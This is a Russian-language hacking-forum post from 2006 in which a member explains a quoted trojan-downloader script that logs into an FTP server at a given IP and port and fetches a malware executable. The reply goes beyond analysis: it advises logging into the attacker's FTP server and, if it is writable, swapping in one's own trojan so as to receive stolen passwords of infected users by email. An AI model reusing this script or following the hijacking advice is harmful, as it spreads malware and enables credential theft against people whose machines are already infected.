Тема: Trojan Downloader
Показать сообщение отдельно

  #5  
Старый 10.03.2006, 18:53
Elekt
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935

Репутация: 1202


Отправить сообщение для Elekt с помощью ICQ
По умолчанию

Цитата:
Сообщение от De_X  
open [Тут IP затем 30294]
user 1 1
get winfifggf.exe
quit

Что этот троян делает? и как можно обратить такой для свойх целей?
Мне вообще интересно, как может новичёк выдрать стоко инфы из троя, и при этом не знать, что это значит

Это троян-Downloader, те в него встроена лишь фунцция закачки чего-нить. Он лезет в интернет по указанному айпи на указанный порт(30294). Судя по синтаксису запроса, это ФТП-сервер. Трой авторизуется под именем юзера "1" и под паролем "1". Затем скачивает к тебе на комп основного тело трояна "winfifggf.exe".

Впринципе, он способен тут же его запустить ФТП-командой "!winfifggf.exe"(кажись, так)
Либо через реестр после перезагрузки.

Как это можно использовать?
Можно зайти на этот ФТП-сервак через какой-нить клиент (например, тотал-командер). Если очень повезёт, у тебя будут прова на запись.
Тогда делаешь своего троя и заменяешь родного на своего =] Гы..
И забираешь отчеты с паролями со своего мыла.

Последний раз редактировалось Elekt; 10.03.2006 в 18:56..
 
Ответить с цитированием